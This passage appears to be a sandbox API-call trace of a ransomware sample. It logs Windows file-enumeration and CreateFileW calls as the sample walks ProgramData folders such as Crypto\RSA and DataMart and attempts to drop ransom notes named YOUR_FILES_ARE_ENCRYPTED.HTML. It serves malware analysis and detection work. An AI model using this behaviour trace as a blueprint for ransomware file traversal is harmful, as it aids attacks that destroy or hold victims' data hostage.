(pszPath="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="" [0109.869] lstrlenW (lpString="") returned 0 [0109.869] PathFindExtensionW (pszPath="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="" [0109.869] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae523547, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae523547, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5288a0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c1a8, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.869] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae523547, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae523547, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5288a0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c1a8, dwReserved1=0x630690, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.869] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.869] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0109.869] GetProcessHeap () returned 0x600000 [0109.869] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0109.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.870] GetProcessHeap () returned 0x600000 [0109.870] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0109.870] GetProcessHeap () returned 0x600000 [0109.870] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.870] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae52d1b7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae52d1b7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae532075, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.870] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae52d1b7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae52d1b7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae532075, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.870] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.871] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0109.871] GetProcessHeap () returned 0x600000 [0109.871] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.871] GetProcessHeap () returned 0x600000 [0109.871] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.871] GetProcessHeap () returned 0x600000 [0109.871] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.872] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="SystemKeys", cAlternateFileName="SYSTEM~1")) returned 1 [0109.872] StrStrIW (lpFirst="SystemKeys", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.872] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys") returned 50 [0109.872] GetProcessHeap () returned 0x600000 [0109.872] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.872] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys" [0109.872] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*" [0109.872] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae541dcb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.873] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xae541dcb, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0109.873] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xd54314ca, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="1FD8A8~1")) returned 1 [0109.873] StrStrIW (lpFirst="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.873] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned 120 [0109.873] PathFindExtensionW (pszPath="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="" [0109.873] lstrlenW (lpString="") returned 0 [0109.873] PathFindExtensionW (pszPath="1fd8a841971dc8f18facf1d9475e3f87_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="" [0109.873] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae53f68a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae53f68a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae546ccf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.873] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae53f68a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae53f68a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae546ccf, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.873] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.873] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0109.873] GetProcessHeap () returned 0x600000 [0109.873] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\SystemKeys\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\systemkeys\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.874] GetProcessHeap () returned 0x600000 [0109.874] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.874] GetProcessHeap () returned 0x600000 [0109.874] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.874] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae54ce81, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae54ce81, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5542a8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.874] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae54ce81, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae54ce81, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae5542a8, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.874] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0109.874] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0109.874] GetProcessHeap () returned 0x600000 [0109.874] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.875] GetProcessHeap () returned 0x600000 [0109.875] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.875] GetProcessHeap () returned 0x600000 [0109.875] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.876] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="DataMart", cAlternateFileName="")) returned 1 [0109.876] StrStrIW (lpFirst="DataMart", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.876] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart") returned 41 [0109.876] GetProcessHeap () returned 0x600000 [0109.876] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.877] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart" [0109.877] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\*" [0109.877] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae58ffa2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.877] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae58ffa2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0109.877] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="PaidWiFi", cAlternateFileName="")) returned 1 [0109.877] StrStrIW (lpFirst="PaidWiFi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.877] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi") returned 50 [0109.878] GetProcessHeap () returned 0x600000 [0109.878] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.878] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi" [0109.879] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*" [0109.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae58505a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0109.879] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae58505a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0109.879] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae58505a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae58505a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae58a19a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.879] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae58505a, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae58505a, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae58a19a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306dc, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.879] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0109.879] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0109.879] GetProcessHeap () returned 0x600000 [0109.879] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.879] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\datamart\\paidwifi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.879] GetProcessHeap () returned 0x600000 [0109.880] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.880] GetProcessHeap () returned 0x600000 [0109.880] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.880] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae58ffa2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae58ffa2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae594db3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.880] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae58ffa2, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae58ffa2, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae594db3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.880] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.880] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0109.880] GetProcessHeap () returned 0x600000 [0109.880] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0109.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\DataMart\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\datamart\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.881] GetProcessHeap () returned 0x600000 [0109.881] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0109.881] GetProcessHeap () returned 0x600000 [0109.881] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.882] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0109.882] StrStrIW (lpFirst="Device Stage", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.882] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage") returned 45 [0109.882] GetProcessHeap () returned 0x600000 [0109.882] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.883] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage" [0109.883] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*" [0109.883] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xae64995a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.883] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, 